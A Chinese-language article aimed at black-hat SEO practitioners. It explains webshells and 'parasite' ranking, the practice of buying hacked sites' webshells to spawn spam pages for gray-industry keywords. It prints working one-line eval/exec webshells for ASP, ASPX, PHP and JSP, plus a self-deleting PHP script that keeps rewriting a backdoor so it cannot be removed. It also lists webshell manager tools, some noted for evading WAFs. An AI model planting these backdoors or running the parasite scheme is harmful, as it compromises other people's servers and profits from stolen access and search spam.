WEBSHELL寄生蟲的排名原理和作用分析

很多剛接觸黑帽SEO的朋友會問到什么是寄生蟲排名技術，寄生蟲主要用來做什么的，有什么作用啊之類的問題。寄生蟲排名技術的發展也是有一定的歷史的，從最初的使用到后來黑帽SEO優化技術中的普及，再到目前的百度快速排名甚至百度霸屏的案例中，都存在寄生蟲技術的身影。

也就是說，在真正操作黑帽SEO優化中，寄生蟲排名這種技術也是大家接觸的最為頻繁的一個工具甚至說是一門技術手法。

下面來給大家詳細講一下黑帽SEO技術中關于webshell與寄生蟲排名技術的一些知識點。

什么是WebShell？

顧名思義，“web”的含義是顯然需要服務器開放web服務，“shell”的含義是取得對服務器某種程度上操作權限。webshell常常被稱為入侵者通過網站端口對網站服務器的某種程度上操作的權限。由于webshell其大多是以動態腳本的形式出現，也有人稱之為網站的后門工具。

Webshell就是以asp、php、jsp或者cgi等網頁文件形式存在的一種代碼執行環境，也可以將其稱做為一種網頁后門。黑客在入侵了一個網站后，通常會將asp或php后門文件與網站目錄下正常的網頁文件混在一起，然后就可以使用瀏覽器來訪問asp或者php后門，得到一個命令執行環境，以達到控制網站服務器的目的。

利用Webshell可以在Web服務器上執行系統命令、竊取數據、植入病毒、Le索核心數據、SEO掛馬等惡意操作，危害極大。

 

WebShell的特點

黑客使用Webshell的第一步通常是將其上傳到可以訪問的服務器中，例如利用用戶CMS系統的第三方插件中的漏洞上傳一個簡單的php Webshell。當然，Webshell類型和作用也不完全相同，一些簡單的Webshell只起到連接外界的作用，允許黑客插入更加精準的惡意腳本，執行他們所需要的指令；另外一些則可能更加復雜，帶有數據庫或文件瀏覽器，讓黑客能夠從數千英里之外的地方查看入侵系統的代碼和數據。無論何種設計，Webshell都極其危險，是網絡罪犯和高級持續威脅(APTs)的常用工具。Webshell常見的攻擊特點主要有以下幾點：

持久化遠程訪問

Webshell腳本通常會包含后門，黑客上傳Webshell之后，就可以充分利用Webshell的后門實現遠程訪問并控制服務器，從而達到長期控制網站服務器的目的。此外，在上傳完Webshell之后，黑客會選擇自己修復漏洞，以確保沒有其他人會利用該漏洞。通過這種方式，黑客就可以一種低調的姿態，避免與管理員進行任何交互，同時仍然獲得相同的結果。

提權

在服務器沒有配置錯誤的情況下，Webshell將在web服務器的用戶權限下運行，而用戶權限是有限的。通過Webshell，黑客可以利用系統上的本地漏洞來實現權限提升，從而獲得Root權限，這樣黑客基本上可以在系統上做任何事情，包括安裝軟件、更改權限、添加和刪除用戶、竊取密碼、閱讀電子郵件等等。

隱蔽性極強

Webshell可以嵌套在正常網頁中運行，且不容易被查殺。它還可以穿越服務器防火墻，由于與被控制的服務器或遠程主機交互的數據都是通過80端口傳遞，因此不會被防火墻攔截，在沒有記錄流量的情況下，Webshell使用post包發送，也不會被記錄在系統日志中，只會在Web日志中記錄一些數據提交的記錄。

WebShell的分類

Webshell根據腳本可以分為PHP腳本木馬，ASP腳本木馬，JSP腳本木馬，也有基于.NET的腳本木馬。根據時代和技術的變遷，也有用python和lua編寫的腳本木馬，常用有如下幾種：

大馬

•體積大，功能全•會調用系統關鍵函數•以代碼加密進行隱藏

小馬

•體積小，功能少•一般只有一個上傳功能，用于上傳大馬

一句話木馬

•代碼短•使用場景大，可單獨生成文件，可插入文件•安全性高，隱藏性強，可變形免殺•框架不變，數據執行，數據傳遞

打包馬

•主要用于打包網站源碼

拖庫馬

•主要用于導出網站數據庫

內存馬

•無文件落地•極難檢測和發現•難以清除

注：之后所講的WebShell就是指一句話木馬

WebShell的原理

Webshell的惡意性表現在它的實現功能上，是一段帶有惡意目的的正常腳本代碼。

不同腳本類型的一句話木馬：

<%eval?request(“cmd”)%>

<%@?Page?Language=”Jscript”%><%eval(Request.Item[“cmd”],”unsafe”);%>

<?php @eval($_POST[‘cmd’]); ?>

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

 

這里僅對PHP的一句話木馬進行分析，核心步驟如下：

數據的傳遞

•$_GET、$_POST、$_COOKIES、$_REQUEST、$_FILE、$_SERVER•從遠程遠程URL中獲取數據: file_get_contents、curl、svn_checkout...（將需要執行的指令數據放在遠程URL中，通過URL_INCLUDE來讀取）•從本地磁盤文件中獲取數據: file、file_get_contents...（將需要執行的指令數據放在本地磁盤文件中，利用IO函數來讀取）•從數據庫中讀取（將需要執行的指令放在數據庫中，利用數據庫函數來讀取）•從圖片頭部中獲取: exif_read_data...（將需要執行的指令數據放在圖片頭部中，利用圖片操作函數來讀取）

代碼執行

將用戶傳輸的數據進行執行

•代碼執行函數：eval、assert、system…執行（這是最普通、標準的代碼執行）•LFI：include、require...（利用瀏覽器的偽協議將文件包含轉化為代碼執行）•動態函數執行：（$()...PHP的動態函數特性）•Curly Syntax：（${${…}}...這種思路可以把變量賦值的漏洞轉化為代碼執行的機會）

內存馬

有關Java內存馬以及JspWebShell的免殺我打算之后在Java代碼審計中詳細講解，這里就全部以PHP的腳本木馬為主。

何為內存馬？

內存馬是無文件攻擊的一種常用手段，隨著攻防演練熱度越來越高：攻防雙方的博弈，流量分析、EDR等專業安全設備被藍方廣泛使用，傳統的文件上傳的webshll或以文件形式駐留的后門越來越容易被檢測到，內存馬使用越來越多。

Webshell內存馬，是在內存中寫入惡意后門和木馬并執行，達到遠程控制Web服務器的一類內存馬，其瞄準了企業的對外窗口：網站、應用。但傳統的Webshell都是基于文件類型的，黑客可以利用上傳工具或網站漏洞植入木馬，區別在于Webshell內存馬是無文件馬，利用中間件的進程執行某些惡意代碼，不會有文件落地，給檢測帶來巨大難度。

PHP內存馬

PHP內存馬，也叫做PHP不死馬、不死僵尸，在線下AWD中是常用手段之一。在蟻劍中也有專門的插件可以一鍵注入內存馬。原理也很簡單，相對于Java可以直接把整個shell寫入內存，php內存馬的實現則是將一個木馬反復寫入，達到無法刪除的目的。

<?php
ignore_user_abort(true); //設置客戶端斷開連接時是否中斷腳本的執行
set_time_limit(0); //設置腳本最大執行時間linux下可能不大好用
unlink(__FILE__); //刪除自身
$file = 'shell.php';
$code = '<?php @eval($_POST["cmd"]);?>';
while (1) {
file_put_contents($file, $code);//惡意代碼
usleep(5000); //延遲執行可有可無
}
?>

本質上原理是不變大，執行死循環，然后刪除自身。但實際上這樣做還是會有文件落地，只是管理員刪不掉、刪不完罷了。我們也可以用利用fastcgi對php攻擊執行命令，但這樣是否算一個駐留wenshell還有待爭議。

WebShell管理工具

中國菜刀（Chopper）

中國菜刀是一款專業的網站管理軟件，用途廣泛，使用方便，小巧實用。只要支持動態腳本的網站，都可以用中國菜刀來進行管理！在非簡體中文環境下使用，自動切換到英文界面。UNICODE方式編譯，支持多國語言輸入顯示。

蟻劍（AntSword）

中國蟻劍是一款開源的跨平臺網站管理工具，它主要面向于合法授權的滲透測試安全人員以及進行常規操作的網站管理員。任何人不得將其用于非法用途以及盈利等目的，否則后果自行承擔！使用編/解碼器進行流量混淆可繞過WAF，并且有多款實用插件。

項目地址：

•https://github.com/AntSwordProject/antSword

冰蝎(Behinder)

冰蝎是一款基于Java開發的動態二進制加密通信流量的新型Webshell客戶端，由于它的通信流量被加密，使用傳統的WAF、IDS等設備難以檢測，目前在HVV中使用較多的一款工具。

項目地址：

•http://github.com/rebeyond/Behinder

哥斯拉(Godzilla)

哥斯拉是一款繼冰蝎之后又一款于Java開發的加密通信流量的新型Webshell客戶端，內置了3種有效載荷以及6種加密器，6種支持腳本后綴，20個內置插件，也是目前在HVV中使用較多的一款工具。

•項目地址：https://github.com/BeichenDream/Godzilla

C刀(Cknife)

C刀是一款基于Java開發的完全基于配置文件的中國菜刀，跨平臺，腳本類型支持ASP、ASPX、PHP、JSP、JSPX、Customize，目前完成的功能有：文件管理、數據庫管理、模擬終端以及代理設置等。

項目地址：

•https://github.com/Chora10/Cknife

Web版菜刀（WebKnife）

WebKnife是陌小離練習ajax時候寫的一款半成品Web版菜刀，目前完成的功能有：文件管理，虛擬終端，文件查看，圖片查看，一鍵掛黑，作者居然還是個00后，tql！

項目地址：

•https://github.com/MoLeft/WebKnife

XISE

XISE是小駿用易語言開發的一款類似于中國菜刀的Webshell網站管理工具，早些年做黑帽SEO的基本人手一份，現在已經停止更新，至于什么原因，大家都懂的！！！

開山斧

開山斧是一款基于Python 2.7X + QT4開發的一款跨平臺菜刀 (Win/Linux/Mac)，體積比較大，剛出來時只用過一次，現在用的人應該不多，也已經停止更新了。

項目地址：

•https://github.com/pyqteval/evlal_win

K8飛刀

K8飛刀是K8哥哥開發的一款Webshell網站管理工具，不得不說他開發的安全工具都很強大且實用，只不過個人感覺略顯臃腫，對新人來說可能不是很友好，有興趣的可以自己去看一下。

項目地址：

•https://github.com/k8gege/K8tools

Weevely

Weevely是一款python編寫的生成和管理php webshell的安全測試工具，目前擁有30多個模塊：文件管理、命令執行、數據庫管理、端口掃描等功能，部分模塊不支持在Windows環境下使用。

項目地址：

•https://github.com/epinna/weevely3

WeBaCoo

WeBaCoo是一款Perl語言編寫的Web后門工具，它的特別之處在于Web服務器和客戶端之間的通信載體是Cookie，這就意味著多數的殺毒軟件、網絡入侵檢測/防御系統、網絡防火墻和應用程序防火墻都無法檢測到該后門的存在。當然，這只是以前的介紹，現在基本都會被檢測了。

一、什么是寄生蟲

寄生蟲排名大多數都是通過從黑客手里購買站點webshell，然后對其站點不斷生成新的頁面產生排名，進行變相無限繁殖。

但有兩點需要注意：

1、一般高權重網站的shell權限很難獲取，因為這類網站大都有專業技術人員在管理維護，黑客沒那么容易拿到權限。

2、一般低權重網站就算你拿到了權限，但也對你排名沒什么很大的價值。

二、常見寄生蟲程序簡介

目前市面上有很多寄生蟲程序，但告訴大家其實這些程序的功能大多相似，主要還是在于寄生蟲程序模版的選擇與使用，是否更適應搜索引擎的排名算法。影響寄生蟲排名的最終結果主要取決于webshell的質量度。沒有強大的高質量的shell，再好的寄生蟲程序也做不出來很好的效果。同樣的話，假如你的webshell質量度很高，相對來說你所繁殖生成的關鍵詞URL鏈接頁面就會通過該shell的主站權重傳遞獲得一個相對不錯的排名結果。

三、寄生蟲的種類

1、從類型上看，寄生蟲程序主要分兩種，即動態寄生蟲和靜態寄生蟲。簡單理解就是生成繁殖的URL鏈接形式分為動態連接和靜態鏈接這兩種形式，從生成的頁面鏈接上就可以看的出來。

2、從程序語言上看，寄生蟲程序又分為ASP版寄生蟲和PHP版寄生蟲，編寫使用語言不同，所繁殖生成的頁面URL鏈接形式也不同。這里大家主要作為了解即可。

四、寄生蟲的排名工作原理

1、寄生蟲程序區別于很多黑帽SEO程序，那么寄生蟲大家都不陌生。但寄生蟲真正的工作原理，是為了更高效率的生存。首先要知道寄生蟲的前身是泛目錄，泛目錄的前身是目錄輪鏈，目錄輪鏈的前身是橋頁。

2、寄生蟲分為客戶端與服務端，新手會有顧慮，為何搞出服務端這么麻煩。但如果是大批量操作，寄生蟲非常節省時間，協助能力也非常的高。

3、寄生蟲的原理是通過客戶端獲取服務器端信息繁殖，因此客戶端就很簡單，只有一個文件，但客戶端放到Shell網站，即可指定的獲取服務器端信息，服務器端信息配置更新，客戶端也會對新的信息進行生成輪鏈。那么客戶端是獲取服務器端信息的，同樣就需要配置服務器端，服務器端進行一次配置。以后不管有幾個Shell站，都可以同時用服務器端配置好的信息。

4、配置好服務器端后，客戶端獲取地址填寫架設服務器端的地址，客戶端放到自己網站、放到Shell站中即會產生數十個目錄輪鏈地址，此時你看到的并不是和泛目錄一樣有很多的目錄，寄生蟲是繁殖的，通過百度蜘蛛或者人工每次訪問，在有訪問的情況下，不管是人工還是蜘蛛，都會在進行繁殖生成的。

5.寄生蟲繁殖可以通過多個Shell無限繁殖，那么值得一說的，寄生蟲同樣有Shell站群功能，通過不同的Shell生成，客戶端會返回URL數據到服務器端，服務器端記錄下此次的繁殖數據，在下次不同的Shell進行繁殖，會鏈接上上一次繁殖的頁面。寄生蟲站群相互鏈接功能，在多個Shell中，寄生蟲會記錄每個URL并進行相互的站群導入導出輪鏈操作。

這就是寄生蟲繁殖的功能，每次生成數十個頁面，通過蜘蛛的來訪，會再繁殖幾十個頁面，以此循環。

五、寄生蟲的作用

1.在有效的資源下，把所有想做的關鍵詞都建立在一個龐大的資源上（適用于灰色產業）。

2.能夠快速的實現大量長尾詞甚至核心詞在搜索引擎上的一個排名提現，帶來收益。

總結：

寄生蟲通過建立強大的鏈接資源庫，推動網站關鍵詞排名上升，實現寄生蟲的最終目的從搜索引擎端獲取到最大規模的流量，通過良好的商業模式，實現盈利。